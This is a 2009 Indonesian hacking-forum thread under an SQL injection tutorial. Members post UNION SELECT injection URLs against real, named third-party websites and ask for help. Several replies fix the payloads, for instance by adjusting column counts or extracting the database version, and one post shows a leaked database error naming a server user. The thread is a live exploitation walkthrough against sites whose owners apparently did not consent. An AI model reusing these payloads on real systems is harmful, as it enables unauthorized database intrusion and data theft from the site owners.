[TUTORIAL] SQL Injection Pada PHP

Forum untuk membahas semua tentang web hacking mulai dari footprint, scanning, gain access, escalate previlege, exploit,cover track, backdoors sampai mengamankan web

Moderators: Paman, Xshadow, indounderground, NeOS-01

Forum rules
Membahas bugs,penetrasi, eksploitasi dan teknik mengamankan website - websrver. Sertakan POC disini agar member dapat mempelajarinya
User avatar
justkid
Posts: 19
Joined: Sat Jul 12, 2008 3:05 am

Re: [TUTORIAL]SQL Injection Pada PHP

Post by justkid » Sun Jun 21, 2009 7:30 pm

http://www.excellentdevelopment.com/news_detail.php?id=
-14%20union%20all%20select%201,2,3,4,5,6,7,8,9,10,
11,12,13,14,15,16,17,18,19,20,21--
ampe situ dah bingung.... :(( :(( :((

maklum newbie :D

mohon bantuan :D

User avatar
ji_bog
Posts: 19
Joined: Sat May 27, 2006 12:22 am
Location: lagi pengen sendiri..
Contact:

Re: [TUTORIAL]SQL Injection Pada PHP

Post by ji_bog » Tue Jun 23, 2009 3:54 am

justkid wrote:
http://www.excellentdevelopment.com/news_detail.php?id=
-14%20union%20all%20select%201,2,3,4,5,6,7,8,9,10,
11,12,13,14,15,16,17,18,19,20,21--
ampe situ dah bingung.... :(( :(( :((

maklum newbie :D

mohon bantuan :D
Column nya kurang bro ;)

Code: Select all

http://www.excellentdevelopment.com/news_detail.php?id=-14%20union%20all%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22--
signatur saya begini aja deh :D

adesurya_tkj
Posts: 15
Joined: Sat Jun 21, 2008 7:09 am
Location: shell
Contact:

Re: [TUTORIAL]SQL Injection Pada PHP

Post by adesurya_tkj » Tue Jun 23, 2009 10:36 am

bagi script nya dong boz,, liumayan tuh,, untuk antisipasi pertama kali...
kasih link nya y..

User avatar
justkid
Posts: 19
Joined: Sat Jul 12, 2008 3:05 am

Re: [TUTORIAL]SQL Injection Pada PHP

Post by justkid » Tue Jun 23, 2009 7:50 pm

justkid wrote:

http://www.excellentdevelopment.com/news_detail.php?id=
-14%20union%20all%20select%201,2,3,4,5,6,7,8,9,10,
11,12,13,14,15,16,17,18,19,20,21--



ampe situ dah bingung.... :(( :(( :((

maklum newbie :D

mohon bantuan :D


Column nya kurang bro ;)

Code: Select all
http://www.excellentdevelopment.com/new ... 20,21,22--
Akhir perjalanan cuman ampe sini.... :((
http://www.excellentdevelopment.com/new ... 4d656e75--

User avatar
exops
Posts: 106
Joined: Sat Mar 07, 2009 1:03 pm
Location: Djogja
Contact:

Re: [TUTORIAL]SQL Injection Pada PHP

Post by exops » Wed Jun 24, 2009 8:20 am

Bi4kKob4r wrote:perhatian aja...
hati2 dalam mencoba

soalnya banyak yang bikin serangan balik

contohnya

harap berdoa sebelum klik :lol:
ups.. kepencet.. :cry:
Semakin banyak memberi, semakin banyak menerima
Image
http://exops.info


abdurrm
Posts: 28
Joined: Sat Mar 01, 2008 9:39 am

Re: [TUTORIAL]SQL Injection Pada PHP

Post by abdurrm » Mon Jun 29, 2009 10:11 pm

aries deris wrote:
Bi4kKob4r wrote:perhatian aja...
hati2 dalam mencoba

soalnya banyak yang bikin serangan balik

contohnya

harap berdoa sebelum klik :lol:
wkwkwkwkwk scriptnya Xshadow
wkwkwkwkwwk
iya tuh isa buat nyerang balik wkwkwkwkwkwkwk
:lol: :lol: :lol: tau itu scriptnya Xshadow pasti gara2 nyebut2 nama ja*an, jan*uk
@Xshadow trimakasih buat tutorial yang di http://www.xcode.or.id/forum2/viewtopic ... 98&t=35565

User avatar
exops
Posts: 106
Joined: Sat Mar 07, 2009 1:03 pm
Location: Djogja
Contact:

Re: [TUTORIAL]SQL Injection Pada PHP

Post by exops » Tue Jun 30, 2009 9:49 am

kok nyampe sini error ya ?
http://www.vnrhcs.org/news_detail.php?i ... on(),3,4--

sama ini nih :
http://www.vnrhcs.org/news_detail.php?i ... 444d494e--

Code: Select all

SELECT command denied to user 'vnr'@'lsh209.chi.us.siteprotect.com' for table 'columnS'
what's wrong ?
Semakin banyak memberi, semakin banyak menerima
Image
http://exops.info

User avatar
Xshadow
Posts: 482
Joined: Thu May 31, 2007 8:01 pm
Location: http://captureflags.com
Contact:

Re: [TUTORIAL]SQL Injection Pada PHP

Post by Xshadow » Tue Jun 30, 2009 3:54 pm

exops wrote:kok nyampe sini error ya ?
http://www.vnrhcs.org/news_detail.php?i ... on(),3,4--
kalo ini nomer-nya kurang... coba ikuti mulai langkah 1 lagi :)

Code: Select all

http://www.vnrhcs.org/news_detail.php?id=-12%20union%20select%201,2,version(),4,5,6,7,8,9--
exops wrote: sama ini nih :
http://www.vnrhcs.org/news_detail.php?i ... 444d494e--

Code: Select all

SELECT command denied to user 'vnr'@'lsh209.chi.us.siteprotect.com' for table 'columnS'
what's wrong ?
The used SELECT statements have a different number of columns
belajar localhost dululah :)
kejadian sama :) kurang nomer :)
[X]perimental [S]ynthetic [H]umanoid [A]ssembled for [D]estruction and [O]nline [W]arfare

Post Reply

Return to “Web Hacking”